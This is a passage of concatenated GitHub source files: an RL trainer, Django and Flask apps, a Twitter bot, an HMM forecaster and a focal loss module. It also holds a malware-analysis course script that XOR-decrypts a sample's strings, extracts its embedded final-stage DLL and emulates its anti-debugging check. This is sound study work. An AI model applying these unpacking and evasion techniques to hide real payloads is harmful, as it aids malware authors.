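    print(base_key, amplitudes.shape)  # -> toy_id (360, 16)
```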
23313577208 | import argparse
import gym
import random
import tensorflow as tf
import numpy as np
from tqdm import trange
from tensorflow import keras
from network import SharedModel
from subproc_env import EnvActor, SubProcessEnv
# Some parameters taken from OpenAI
# baselines implementation, since
# they're not mentioned in the paper.
num_actors = 8
# Values taken from Atari experiments
# in original paper where relevant
gae_lambda = 0.95
gamma = 0.99
base_clip_epsilon = 0.1
max_steps = 1e6
base_learning_rate = 2.5e-4
horizon = 128
batch_size = 32
optim_epochs = 3
value_loss_coefficient = 1
entropy_loss_coefficient = .01
gradient_max = 10.0
start_t = 0
checkpoint_filename = "./ppo-model.ckpt"
log_dir = "./tb_log"
SMALL_NUM = 1e-8
def main():
env_name = "PongNoFrameskip-v4"
# NOTE: This is currently not used since we use SubProcessEnv instead;
# only used for getting shape of observation/acton space.
unused_env = gym.make(env_name)
#pobs_shape = unused_env.observation_space.shape
# Hard-coding pre-processing step shape; could read it from an example output instead?
obs_shape = (84, 84, 4)
num_actions = unused_env.action_space.n
model = SharedModel(obs_shape, num_actions)
t = start_t
last_save = 0
actors = []
for ii in range(num_actors):
actors.append(EnvActor(SubProcessEnv(env_name), model, num_actions))
while(t <= max_steps):
for ii in range(horizon):
for actor in actors:
actor.step_env(t)
t += 1
for actor in actors:
actor.calculate_horizon_advantages(t)
# Construct randomly sampled (without replacement) mini-batches.
obs_horizon = []
act_horizon = []
policy_horizon = []
adv_est_horizon = []
val_est_horizon = []
for actor in actors:
obs_a, act_a, policy_a, adv_est_a, val_est_a = actor.get_horizon(t)
obs_horizon.extend(obs_a)
act_horizon.extend(act_a)
policy_horizon.extend(policy_a)
adv_est_horizon.extend(adv_est_a)
val_est_horizon.extend(val_est_a)
# Normalizing advantage estimates.
# NOTE: Adding this significantly improved performance
# NOTE: Moved this out of each individual actor, so that advantages for the whole batch are normalized with each other.
adv_est_horizon = np.array(adv_est_horizon)
adv_est_horizon = (adv_est_horizon - np.mean(adv_est_horizon)) / (np.std(adv_est_horizon) + SMALL_NUM)
num_samples = len(obs_horizon)
indices = list(range(num_samples))
for e in range(optim_epochs):
random.shuffle(indices)
ii = 0
# TODO: Don't crash if batch_size is not a divisor of total sample count.
while ii < num_samples:
obs_batch = []
act_batch = []
policy_batch = []
adv_batch = []
value_sample_batch = []
for _ in range(batch_size):
index = indices[ii]
obs_batch.append(obs_horizon[index].__array__())
act_batch.append(act_horizon[index].__array__())
policy_batch.append(policy_horizon[index].__array__())
adv_batch.append(adv_est_horizon[index].__array__())
value_sample_batch.append(val_est_horizon[index])
ii += 1
def alpha_anneal(t):
return np.maximum(1.0 - (float(t) / float(max_steps)), 0.0)
total_loss = model.train(np.array(obs_batch),
np.array(act_batch),
np.array(policy_batch),
np.array(adv_batch),
np.array(value_sample_batch),
alpha_anneal(t))
for actor in actors:
actor.flush(t)
if t-last_save > 10000:
print("Saving network")
model.network.save(checkpoint_filename)
last_save = t
all_ep_rewards = []
for actor in actors:
all_ep_rewards.extend(actor.episode_rewards)
if len(all_ep_rewards) >= 10:
print("T: %d" % (t,))
print("\tAVG Reward: %f" % (np.mean(all_ep_rewards),))
print("\tMIN Reward: %f" % (np.amin(all_ep_rewards),))
print("\tMAX Reward: %f" % (np.amax(all_ep_rewards),))
for actor in actors:
actor.episode_rewards = []
if __name__ == '__main__':
main() | james-sorrell/reinforcement_learning | atari/ppo/main.py | main.py | py | 4,674 | python | en | code | 2 | github-code | 36 |
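The actors above compute GAE advantages inside EnvActor (not shown in this file); a generic sketch of that estimator, reusing the gamma and gae_lambda values set above but otherwise not taken from the repo:

```python
import numpy as np

def gae(rewards, values, gamma=0.99, lam=0.95):
    """Generalized Advantage Estimation for one trajectory.
    `values` holds len(rewards) + 1 entries; the extra entry is the bootstrap value."""
    adv = np.zeros(len(rewards))
    running = 0.0
    for t in reversed(range(len(rewards))):
        delta = rewards[t] + gamma * values[t + 1] - values[t]
        running = delta + gamma * lam * running
        adv[t] = running
    return adv

rewards = np.array([1.0, 0.0, 0.0, 1.0])
values = np.array([0.5, 0.4, 0.3, 0.2, 0.0])
advantages = gae(rewards, values)
advantages = (advantages - advantages.mean()) / (advantages.std() + 1e-8)  # same normalization as above
print(np.round(advantages, 3))
```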
39209701807 | # Create your views here.
from django.shortcuts import render
from team.models import Player
from django.shortcuts import render, get_object_or_404, redirect, render_to_response
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
def home(request):
context = {'message': 'Here is a message!'}
return render(request, "team/home.html", context)
def roster(request):
player_list = Player.objects.all()
paginator = Paginator(player_list, 100)
page = request.GET.get('page')
try:
players=paginator.page(page)
except PageNotAnInteger:
players = paginator.page(1)
except EmptyPage:
players = paginator.page(1)
return render(request, "team/roster.html", {'players': players})
def player(request, pk):
player = get_object_or_404(Player, id=pk)
return render(request, "team/player.html", {'player': player})
| carolinp/Project-1 | team/views.py | views.py | py | 890 | python | en | code | 0 | github-code | 36 |
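A hypothetical urls.py that would wire up the three views above; the route paths and names are illustrative, not taken from the project:

```python
from django.urls import path
from team import views

urlpatterns = [
    path('', views.home, name='home'),
    path('roster/', views.roster, name='roster'),
    path('player/<int:pk>/', views.player, name='player'),
]
```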
36872129562 | #! /usr/bin/python3
# -*- coding:utf-8 -*-
from flask import Flask, request, render_template, redirect
import json
import os
app = Flask(__name__)
@app.route('/')
def accueil():
if os.path.exists("db")==False:
os.mkdir("db")
return render_template('index.html')
@app.route('/formule')
def reponse():
list_qst = []
if os.path.exists("db/questions.json") == True:
file = open("db/questions.json", "r")
list_qst = json.load(file)
file.close()
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
return render_template('formule.html', list_qst=list_qst, list_tache=list_tache)
@app.route('/questions', methods=['POST', 'GET'])
def questions():
list_qst = []
if os.path.exists("db/questions.json") == True:
file = open("db/questions.json", "r")
list_qst = json.load(file)
file.close()
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
if request.method == 'POST':
qst = request.form['qst']
tache = request.form['tache']
i = 0
for t in list_tache:
if str(t['id']) == str(tache):
tache = list_tache[i]
break
i = i+1
file = open("db/questions.json", "w")
txt = {
"id": len(list_qst),
"question": qst,
"tache": tache
}
list_qst.append(txt)
file.write(json.dumps(list_qst, indent=True))
file.close()
return render_template('questions.html', list_qst=list_qst, list_tache=list_tache)
@app.route('/update_qst', methods=['POST', 'GET'])
def update_qst():
list_qst = []
if os.path.exists("db/questions.json") == True:
file = open("db/questions.json", "r")
list_qst = json.load(file)
file.close()
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
if request.method == 'POST':
id = request.form['id']
qst = request.form['qst']
tache = request.form['tache']
i = 0
for t in list_tache:
if str(t['id']) == str(tache):
tache = list_tache[i]
break
i = i+1
i = 0
for q in list_qst:
if str(q['id']) == str(id):
list_qst[i]['question'] = qst
list_qst[i]['tache'] = tache
break
i = i+1
file = open("db/questions.json", "w")
file.write(json.dumps(list_qst, indent=True))
file.close()
return redirect('/questions')
@app.route('/taches', methods=['POST', 'GET'])
def taches():
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
if request.method == 'POST':
tache = request.form['tache']
file = open("db/taches.json", "w")
txt = {
"id": len(list_tache),
"tache": tache
}
list_tache.append(txt)
file.write(json.dumps(list_tache, indent=True))
file.close()
return render_template('taches.html', list_tache=list_tache)
@app.route('/update_tache', methods=['POST', 'GET'])
def update_tache():
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
if request.method == 'POST':
id = request.form['id']
tache = request.form['tache']
i = 0
for t in list_tache:
if str(t['id']) == str(id):
list_tache[i]['tache'] = tache
break
i = i+1
file = open("db/taches.json", "w")
file.write(json.dumps(list_tache, indent=True))
file.close()
up_qst()
return redirect('/taches')
def up_qst():
list_qst = []
if os.path.exists("db/questions.json") == True:
file = open("db/questions.json", "r")
list_qst = json.load(file)
file.close()
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
i = 0
for q in list_qst:
for t in list_tache:
if str(t['id']) == str(q['id']):
list_qst[i]['tache'] = t
i = i+1
file = open("db/questions.json", "w")
file.write(json.dumps(list_qst, indent=True))
file.close()
@app.route('/add_reponse', methods=['POST', 'GET'])
def add_reponse():
list_qst = []
if os.path.exists("db/questions.json") == True:
file = open("db/questions.json", "r")
list_qst = json.load(file)
file.close()
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
list_reponse = []
if os.path.exists("db/reponses.json") == True:
file = open("db/reponses.json", "r")
list_reponse = json.load(file)
file.close()
if request.method == 'POST':
resp = {}
resp['nom'] = request.form['nom']
resp['prenom'] = request.form['prenom']
nom = str(request.form['nom']).upper()+" " + \
str(request.form['prenom']).upper()
resp['sexe'] = request.form['sexe']
resp['profession'] = request.form['profession']
for t in list_tache:
for q in list_qst:
if str(t['id']) == str(q['tache']['id']):
resp['question_'+str(q['id'])] = q
tmp = 'resp'+str(q['id'])
resp['reponse_'+str(q['id'])] = request.form[tmp]
tmp = 'justif'+str(q['id'])
resp['justification_'+str(q['id'])] = request.form[tmp]
list_reponse.append(resp)
file = open("db/reponses.json", "w")
file.write(json.dumps(list_reponse, indent=True))
file.close()
return redirect('/success/'+nom)
else:
return redirect('/formule')
@app.route('/success/<nom>')
def success(nom):
return render_template('success.html', nom=nom)
@app.route('/getData', methods=['POST', 'GET'])
def chart():
res=[]
if request.method == 'POST':
list_reponse = []
if os.path.exists("db/reponses.json") == True:
file = open("db/reponses.json", "r")
list_reponse = json.load(file)
file.close()
list_qst = []
if os.path.exists("db/questions.json") == True:
file = open("db/questions.json", "r")
list_qst = json.load(file)
file.close()
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
for t in list_tache:
out = {}
out['tache'] = t['tache']
out['non'] = 0
out['oui'] = 0
for q in list_qst:
if str(q['tache']['id']) == str(t['id']):
id = str(q['id'])
for r in list_reponse:
if str(r['reponse_'+id]).lower() == "non":
out['non'] = out['non']+1
elif str(r['reponse_'+id]).lower() == "oui":
out['oui'] = out['oui']+1
res.append(out)
return json.dumps(res)
if __name__ == '__main__':
app.run(debug=True)
| yahyalazaar/audit_project | __init__.py | __init__.py | py | 7,848 | python | en | code | 0 | github-code | 36 |
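The load/dump pattern around every JSON file above is repeated in each route; a small helper in that spirit (a sketch, not part of the app) could centralise it:

```python
import json
import os

def load_json(path, default=None):
    """Return the parsed file, or a default (empty list) when it does not exist yet."""
    if os.path.exists(path):
        with open(path, 'r') as fh:
            return json.load(fh)
    return [] if default is None else default

def save_json(path, data):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, 'w') as fh:
        fh.write(json.dumps(data, indent=True))

questions = load_json('db/questions.json')
questions.append({'id': len(questions), 'question': 'example?', 'tache': None})
save_json('db/questions.json', questions)
```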
7784263631 | import twitter
class pytwitter_forecast(NebriOS):
listens_to = ['forecast_date']
def check(self):
return True
def action(self):
auth = twitter.OAuth(shared.ttoken, shared.ttoken_secret, shared.tconsumer_key, shared.tconsumer_secret)
t = twitter.Twitter(auth=auth)
status = "Forecast: " + self.check_city_forecast + " is " + self.forecast_text + " with temperature "+ self.forecast_lo + " - " + self.forecast_hi + " °C for " + self.forecast_date
try:
t.account.verify_credentials()
try:
t.statuses.update(status=status)
# uncomment to update KVP of auth status for checking
#self.pytwitter_update = "Run"
except:
self.pytwitter_update = "Fail"
except:
self.pytwitter_auth = "Fail"
| bandono/nebri | tweet_rain/pytwitter_forecast.py | pytwitter_forecast.py | py | 874 | python | en | code | 0 | github-code | 36 |
39184736012 | ####################### IMPORT LIBRARIES ####################################
from pandas import ExcelFile, read_excel
from pandas import datetime
from sklearn.metrics import mean_squared_error
from math import sqrt
import matplotlib.pyplot as plt
import warnings
from hmmlearn.hmm import GaussianHMM
import numpy as np
import time
####################### FUNCTION TO READ FILE ################################
def readfile(coin_file, attribute):
''' Function to read and parse the data '''
# Read excel file
xls = ExcelFile(coin_file)
# Date parser
def parser(x):
try:
return datetime.strptime(str(x),'%Y-%m-%d %H:%M:%S')
except:
return datetime.strptime(str(x),'%Y-%m-%d')
series = read_excel(xls, attribute, header = 0, parse_dates =[0], index_col = 0, squeeze = True, date_parser = parser)
series = series.fillna(0)
# Store in array
X = series.values
return X
###################### FUNCTION TO SPLIT THE DATA INTO TRAINING AND TEST SET #######
def train_test_split(X, fraction):
''' Function to split the data into training and test set '''
# Train test split
size = int(len(X)*fraction)
train,test = X[0:size], X[size:len(X)]
return train,test
##################### FUNCTION TO DEFINE GAUSSIAN HIDDEN MARKOV MODEL ###############
def GaussHMM(n_comp,cov_type,n_itr,train,num_samples_test):
''' Function to define Gaussian Hidden Markov Model '''
# Reshape training data
history = train.reshape(-1,1)
# Gaussian hidden markov model
hmm = GaussianHMM(n_components = n_comp, covariance_type = cov_type, n_iter = n_itr)
with warnings.catch_warnings():
warnings.simplefilter('ignore')
hmm.fit(history)
# Generate samples
samples_test, _ = hmm.sample(num_samples_test)
return samples_test
###################### FUNCTION TO CALCULATE PREDICTIONS AND EXPECTATIONS #############
def pred_expect(test,variable, samples_test, pred, expect):
''' Function to calculate predictions and expectations '''
# Loop over test data
for i in range(len(test)):
# Integer values
if variable == 'int':
if round(samples_test[i][0]) < 0:
pred.append(0)
else:
pred.append(round(samples_test[i][0]))
# decimal values
else:
if samples_test[i][0] < 0:
pred.append(0)
else:
pred.append(samples_test[i][0])
expect.append(test[i])
return pred, expect
############################# FUNCTION TO CALCULATE RMSE ###############################
def rmse(coin_file, attribute,iterations,fraction,n_comp,cov_type,n_itr,var):
''' Function to calculate RMSE '''
X = readfile(coin_file,attribute)
train,test = train_test_split(X,fraction)
rmse_test = list()
for j in range(iterations):
######################## FOR FINAL RMSE ############################
pred = list()
expect = list()
num_samples_test = len(test) # number of samples to be generated
samples_test = GaussHMM(n_comp,cov_type,n_itr,train,num_samples_test)
pred,expect = pred_expect(test,var,samples_test, pred, expect)
rmse_test.append(sqrt(mean_squared_error(pred,expect)))
return rmse_test
##################### PRINT AVERAGE RMSE FOR TEST DATA #####################
coin_file = '4_RLC.xlsx' # Filename
attribute = 'exchange' # attribute
iterations = 30 # number of iterations for averaging rmse
fraction = 0.80 # Train - test split
n_comp = 7 # n_components for Gaussian HMM
cov_type = 'diag' # covariance_type for Gaussian HMM
n_itr = 1000 # n_iter for Gaussian HMM
var = 'float' # Integer or Float valued attribute
start = time.time()
rmse_test = rmse(coin_file, attribute,iterations,fraction,n_comp,cov_type,n_itr,var)
end = time.time()
print('The average RMSE over %d iterations is %.3f' %(iterations,np.array(rmse_test).mean()))
print('The time taken is %.3f seconds' %(end - start))
| srihari1212/bloqq | HMM/Docstring_HMM_test.py | Docstring_HMM_test.py | py | 4,173 | python | en | code | 0 | github-code | 36 |
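A compact, self-contained run of the same fit/sample/RMSE pipeline on a synthetic series, using the hyper-parameters set above; only the data is made up:

```python
import numpy as np
from hmmlearn.hmm import GaussianHMM
from sklearn.metrics import mean_squared_error

rng = np.random.default_rng(0)
series = np.cumsum(rng.normal(size=300)) + 50.0    # synthetic stand-in for one coin attribute

split = int(len(series) * 0.80)
train, test = series[:split], series[split:]

model = GaussianHMM(n_components=7, covariance_type='diag', n_iter=1000)
model.fit(train.reshape(-1, 1))
samples, _ = model.sample(len(test))

pred = np.clip(samples[:, 0], 0, None)             # negatives floored at 0, as above
print('RMSE: %.3f' % (mean_squared_error(test, pred) ** 0.5))
```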
20170707726 | from dumpulator import Dumpulator
from pwn import *
import inspect
import sys
"""
.rdata:010F3C7C xmmword_10F3C7C xmmword 0BACA7A0A1B6B4A5BAEAEFF6B5B1B1BDAh
.rdata:010F3C7C ; DATA XREF: dga+6Er
.rdata:010F3C8C xmmword_10F3C8C xmmword 2818CF8A0A988AAE2B4A7BAE8AAA6ABEh
.rdata:010F3C8C ; DATA XREF: dga+8Br
.rdata:010F3C9C word_10F3C9C dw 0EAh ; DATA XREF: dga+7Ar
.rdata:010F3C9E align 10h
.rdata:010F3CA0 ; const char Delimiter[2]
.rdata:010F3CA0 Delimiter db '\',0 ; DATA XREF: _main+2Eo
.rdata:010F3CA0 ; _main:loc_10E1EE2o
.rdata:010F3CA2 align 4
.rdata:010F3CA4 qword_10F3CA4 dq 13B6A6F6B6A60734h ; DATA XREF: sub_10E13A0+1Br
.rdata:010F3CAC dword_10F3CAC dd 87F657h ; DATA XREF: sub_10E13A0+30r
.rdata:010F3CB0 dword_10F3CB0 dd 720063h ; DATA XREF: sub_10E13A0+DFr
.rdata:010F3CB4 dword_10F3CB4 dd 6C0075h ; DATA XREF: sub_10E13A0+E6r
.rdata:010F3CB8 dword_10F3CB8 dd 61006Fh ; DATA XREF: sub_10E13A0+EEr
.rdata:010F3CBC dword_10F3CBC dd 650064h ; DATA XREF: sub_10E13A0+F6r
.rdata:010F3CC0 dword_10F3CC0 dd 72h ; DATA XREF: sub_10E13A0+FEr
.rdata:010F3CC4 qword_10F3CC4 dq 8EFE6F5FBFEFFF8Eh ; DATA XREF: sub_10E13A0+191r
.rdata:010F3CCC word_10F3CCC dw 9Fh ; DATA XREF: sub_10E13A0+189r
.rdata:010F3CCE align 10h
.rdata:010F3CD0 xmmword_10F3CD0 xmmword 61616161616161616161616161616161h
.rdata:010F3CD0 ; DATA XREF: sub_10E13A0+205r
.rdata:010F3CE0 xmmword_10F3CE0 xmmword 659B537ED2F05B7D47742A227C6FFE70h
.rdata:010F3CE0 ; DATA XREF: sub_10E1000+13r
.rdata:010F3CF0 ; Debug Directory entries
.rdata:010F3CF0 dd 0 ; Characteristics
.rdata:010F3CF4 dd 5EE8C20Ch ; TimeDateStamp: Tue Jun 16 12:58:52 2020
.rdata:010F3CF8 dw 0 ; MajorVersion
.rdata:010F3CFA dw 0 ; MinorVersion
.rdata:010F3CFC dd 0Dh ; Type: IMAGE_DEBUG_TYPE_POGO
.rdata:010F3D00 dd 268h ; SizeOfData
.rdata:010F3D04 dd rva aGctl ; AddressOfRawData
.rdata:010F3D08 dd 12BECh ; PointerToRawData
.rdata:010F3D0C dd 0 ; Characteristics
.rdata:010F3D10 dd 5EE8C20Ch ; TimeDateStamp: Tue Jun 16 12:58:52 2020
.rdata:010F3D14 dw 0 ; MajorVersion
.rdata:010F3D16 dw 0 ; MinorVersion
.rdata:010F3D18 dd 0Eh ; Type: IMAGE_DEBUG_TYPE_ILTCG
.rdata:010F3D1C dd 0 ; SizeOfData
.rdata:010F3D20 dd 0 ; AddressOfRawData
.rdata:010F3D24 dd 0 ; PointerToRawData
.rdata:010F3D28 __load_config_used dd 0B8h ; Size
.rdata:010F3D2C dd 0 ; Time stamp
.rdata:010F3D30 dw 2 dup(0) ; Version: 0.0
.rdata:010F3D34 dd 0 ; GlobalFlagsClear
.rdata:010F3D38 dd 0 ; GlobalFlagsSet
.rdata:010F3D3C dd 0 ; CriticalSectionDefaultTimeout
.rdata:010F3D40 dd 0 ; DeCommitFreeBlockThreshold
.rdata:010F3D44 dd 0 ; DeCommitTotalFreeThreshold
.rdata:010F3D48 dd 0 ; LockPrefixTable
.rdata:010F3D4C dd 0 ; MaximumAllocationSize
.rdata:010F3D50 dd 0 ; VirtualMemoryThreshold
.rdata:010F3D54 dd 0 ; ProcessAffinityMask
.rdata:010F3D58 dd 0 ; ProcessHeapFlags
.rdata:010F3D5C dw 0 ; CSDVersion
.rdata:010F3D5E dw 0 ; Reserved1
.rdata:010F3D60 dd 0 ; EditList
.rdata:010F3D64 dd offset ___security_cookie ; SecurityCookie
.rdata:010F3D68 dd offset ___safe_se_handler_table ; SEHandlerTable
.rdata:010F3D6C dd 3 ; SEHandlerCount
.rdata:010F3D70 dd offset ___guard_check_icall_fptr ; GuardCFCheckFunctionPointer
.rdata:010F3D74 dd 0 ; GuardCFDispatchFunctionPointer
.rdata:010F3D78 dd 0 ; GuardCFFunctionTable
.rdata:010F3D7C dd 0 ; GuardCFFunctionCount
.rdata:010F3D80 dd 100h ; GuardFlags
"""
def decrypt_one_string():
string="0x13B6A6F6B6A60734"
rez = ""
for i in range(2,len(string),2):
rez +=(chr(int(string[i:i+2][::-1],base=16)^ 0x1f ))
print(rez[::-1])
def decrypt_string_two():
string="0xE8FFFEFBF5F6EFE8F9"
rez = ""
for i in range(2,len(string),2):
rez +=(chr(int(string[i:i+2],base=16)^ 0x9A ))
print(rez[::-1])
def decrypt_string_three():
s1 = "0x7C6D1DBD1FEF1D5DDC6CCCBC5FEF891E"
s2 = "0x7CAD7CC86D1DDCAC1C4D1DEF0919FC"
rez = ""
rez2 = ""
for i in range(2,len(s1),2):
rez +=(chr(int(s1[i:i+2][::-1],base=16)^ 0xA2 ))
print(rez[::-1])
for i in range(2,len(s2),2):
rez2 +=(chr(int(s2[i:i+2][::-1],base=16)^ 0xA2 ))
print(rez2[::-1])
def decrypt_string_four():
"""
Fking decrypt this after finding where tf is isdebuggerpresent // peb->isprocessdebugged???
LABEL_16:
v21 = dword_10F6AA8;
}
else
{
while ( 1 )
{
v15 = String;
if ( *String == *v17 && *&String[4] == *(v17 + 4) && v35 == *(v17 + 8) )
break;
++v20;
++v17;
if ( v20 >= dwSize )
goto LABEL_16;
}
v1 = (v17 + 9);
v21 = dwSize - v20 - 9;
dword_10F6AA8 = v21;
}
v22 = 0;
if ( v21 && v21 >= 0x40 )
{
v23 = v1 + 32;
v17 = v21 & 0xFFFFFFC0;
do
{
v24 = *(v23 - 2);
v23 += 64;
v22 += 64;
*(v23 - 6) = _mm_xor_si128(xmmword_10F3CD0, v24);
*(v23 - 5) = _mm_xor_si128(*(v23 - 5), xmmword_10F3CD0);
*(v23 - 4) = _mm_xor_si128(*(v23 - 4), xmmword_10F3CD0);
*(v23 - 3) = _mm_xor_si128(*(v23 - 3), xmmword_10F3CD0);
}
while ( v22 < v17 );
}
for ( ; v22 < v21; ++v22 )
v1[v22] ^= 0x61u;
"""
v21 = 0
file = open(sys.argv[1],"rb")
v14 = file.read()
print(hexdump(v14[v14.index(b'redaolurc')+9:]))
s = ""
k = v14[v14.index(b'redaolurc')+9:]
print(type(k))
for i in k:
s+= chr(i ^ 0x61)
print("=======================================")
print(hexdump(s))
print("!!!!!!!!!!!!!!saving final stage to .dll file!!!!!!!!!!\n")
print("!!!!!!!!!!!!!!please stad by!!!!!!!!!!!!!!!!!!!!!!!\n")
z = open("final_stage_payload.dll","wb")
decrypted = bytearray()
for i in k:
decrypted.append(i ^ 0x61)
z.write(decrypted)
z.close()
file.close()
def decrypt_string_five():
s2="0x2818CF8A0A988AAE2B4A7BAE8AAA6ABE"
s1="0xBACA7A0A1B6B4A5BAEAEFF6B5B1B1BDA"
rez = ""
for i in range(2,len(s1),2):
rez +=(chr(int(s1[i:i+2][::-1],base=16)^ 0xC5 ))
print(rez[::-1])
rez2 = ""
for i in range(2,len(s2),2):
rez2 +=(chr(int(s2[i:i+2][::-1],base=16)^ 0xC5 ))
print(rez2[::-1])
def anti_analysis_decryption_check():
"""
bottom line is this :
659B537ED2F05B7D47742A227C6FFE70
this is actually an concatenation of the 4 byte hash-es which break down to
| 65 9B 53 7E |D2 F0 5B 7D |47 74 2A 22| 7C 6F FE 70
so by definition/ canonicall function call looks like this
sub_1351000(v3, v4, v5), where args are
003EF4A4 00715F38 &"C:\\Users\\pwn\\Desktop\\stage2_challenge_mal_analysis.dll" v5
003EF4A8 003EF580 v4
003EF4AC 00000000 v3
"""
dp = Dumpulator("2nd_stage.dmp")
prolog_start = 0x13510D0
prolog_stop = 0x135118A
crc_lookup_table = []
dp.start(begin=prolog_start,end=prolog_stop)
print(dir(dp))
print("!!!!!!!!!!!dumping crc lookup tablen!!!!!!!!\n")
print("!!!!!!please stand by!!!!!!!!\n")
for i in range(0,256):
iterator = i * 4
crc_lookup_table.append(hex(dp.read_ptr(0x1366290+iterator)))
#print(crc_lookup_table)
process_list_input = ["system","smss.exe","crss.exe",]
v7 = "s\x00y\x00s\x00t\x00e\00m\x00\x00"
v6 = len(v7)-1
v1 = v7[v6]
eax = "0xffffffff"
ctr_eax = 2
cnt_eax = 0
cnt_shift_idx_eax = 0
crn_shift_idx_eax = 2
res_tmp = ""
rez_final = 0
for j in range(0,v6):
if(cnt_shift_idx_eax == 4):
ctr_shift_idx_eax = 2
if(cnt_eax == 4):
ctr_eax = 2
print(eax[ctr_eax:ctr_eax+2])
cur_eax = int(eax[ctr_eax:ctr_eax+2],base=16)
print(cur_eax)
res_tmp = ord(v7[j]) ^ cur_eax
print(res_tmp)
shift_rez = cur_eax >> 8
print(shift_rez)
if(shift_rez == 0):
print("aci")
print(type(eax[crn_shift_idx_eax]))
print(eax[crn_shift_idx_eax])
print(eax[crn_shift_idx_eax+1])
eax = eax.replace(eax[crn_shift_idx_eax],"0").replace(eax[crn_shift_idx_eax+1],"0")
print(eax)
else:
print("aici2")
to_replace_one = hex(shift_rez)[2]
to_replace_two = hex(shift_rez)[3]
eax = eax.replace(eax[crn_shift_idx_eax],to_replace_one).replace(eax[crn_shift_idx_eax+1],to_replace_two)
print(eax)
print(hex(res_tmp))
rez_final = int(eax,base=16) ^ int(crc_lookup_table[res_tmp],base=16)
print(hex(rez_final))
eax=hex(rez_final)
ctr_eax+=2
cnt_eax+=1
crn_shift_idx_eax+=2
cnt_shift_idx_eax+=1
enc_process = "0x659B537ED2F05B7D47742A227C6FFE70"
for i in range(2,len(enc_process),8):
if(enc_process[i] != rez_final):
print(enc_process[i:i+8])
print("ye,we are not being debugged")
decrypt_string_four()
anti_analysis_decryption_check()
| SpiralBL0CK/ZERO2AUTO-CUSTOM-SAMPLE-SOLUTION | stage2_decrypt_strings_mal_analysis_corse.py | stage2_decrypt_strings_mal_analysis_corse.py | py | 10,493 | python | en | code | 0 | github-code | 36 |
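All of the decrypt_* routines above are single-byte XOR over nibble-swapped hex pairs; a small helper that reproduces decrypt_one_string (same input string and key) is sketched below:

```python
def xor_decrypt_hex(hex_string, key, swap_nibbles=True):
    """Single-byte XOR over a '0x...' hex blob, optionally reversing each hex pair
    the way the routines above do, then reversing the whole result."""
    out = []
    for i in range(2, len(hex_string), 2):
        pair = hex_string[i:i + 2]
        if swap_nibbles:
            pair = pair[::-1]
        out.append(chr(int(pair, 16) ^ key))
    return ''.join(out)[::-1]

print(xor_decrypt_hex("0x13B6A6F6B6A60734", 0x1F))   # same input/key as decrypt_one_string
```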
18482541642 | import torch
import torch.nn as nn
import torch.nn.functional as F
from .utils import weight_reduce_loss
class FocalLoss(nn.Module):
def __init__(self,
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
reduction='mean',
loss_weight=1.0):
super(FocalLoss, self).__init__()
assert use_sigmoid is True, 'Only sigmoid focal loss supported now.'
self.use_sigmoid = use_sigmoid
self.gamma = gamma
self.alpha = alpha
self.reduction = reduction
self.loss_weight = loss_weight
def forward(self,
pred,
target,
weight=None,
avg_factor=None):
device = pred.device
assert pred.shape[0] == target.shape[0]
if len(target.shape) == 1:
target = torch.zeros(
pred.shape,
dtype=torch.long,
device=device).scatter_(
1, target.view(-1, 1), 1)
pred_sigmoid = pred.sigmoid()
pred_sigmoid = torch.clamp(pred_sigmoid, 1e-4, 1.0 - 1e-4)
target = target.type_as(pred)
pt = (1 - pred_sigmoid) * target + pred_sigmoid * (1 - target)
focal_weight = (self.alpha * target + (1 - self.alpha) *
(1 - target)) * pt.pow(self.gamma)
loss = F.binary_cross_entropy_with_logits(
pred, target, reduction='none') * focal_weight
loss = torch.where(torch.ne(target, -1.0),
loss, torch.zeros(loss.shape).to(device))
loss = self.loss_weight * weight_reduce_loss(
loss,
weight=weight,
reduction=self.reduction,
avg_factor=avg_factor)
return loss
| TWSFar/FCOS | models/losses/focal_loss.py | focal_loss.py | py | 1,798 | python | en | code | 1 | github-code | 36 |
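A self-contained functional sketch of the same sigmoid focal loss (mean reduction only, no label weighting or avg_factor handling), exercised with dummy tensors:

```python
import torch
import torch.nn.functional as F

def sigmoid_focal_loss(pred, target_onehot, gamma=2.0, alpha=0.25):
    # Same math as the module above: clamp, focal weight, BCE-with-logits, mean.
    p = torch.clamp(pred.sigmoid(), 1e-4, 1 - 1e-4)
    pt = (1 - p) * target_onehot + p * (1 - target_onehot)
    weight = (alpha * target_onehot + (1 - alpha) * (1 - target_onehot)) * pt.pow(gamma)
    loss = F.binary_cross_entropy_with_logits(pred, target_onehot, reduction='none') * weight
    return loss.mean()

logits = torch.randn(8, 80)                          # 8 predictions over 80 classes
labels = torch.randint(0, 80, (8,))
onehot = F.one_hot(labels, num_classes=80).float()
print(float(sigmoid_focal_loss(logits, onehot)))
```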
16828444501 | from flask import Flask,request
import sqlite3
app = Flask(__name__)
connection = sqlite3.connect('sms.db')
curser = connection.cursor()
curser.execute('create table if not exists students (sid integer primary key,name text,age integer,address text)')
connection.close()
@app.route('/student_details')
def details():
connection = sqlite3.connect('sms.db')
curser = connection.cursor()
return {'students' : list(curser.execute('select * from students'))}
@app.route('/details',methods = ['POST'])
def register():
data = request.get_json()
connection = sqlite3.connect('sms.db')
curser = connection.cursor()
curser.execute("insert into students values(?,?,?,?)", (data['sid'], data['name'], data['age'], data['address']))
connection.commit()
connection.close()
return 'User Created Successfully.. '
app.run(port=5000) | mubarakdalvi/mubarakdalvi | studnt_management.py | studnt_management.py | py | 868 | python | en | code | 0 | github-code | 36 |
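A quick manual test of the two routes above, assuming the app is running locally on port 5000; the sample record is made up:

```python
import requests

requests.post('http://127.0.0.1:5000/details',
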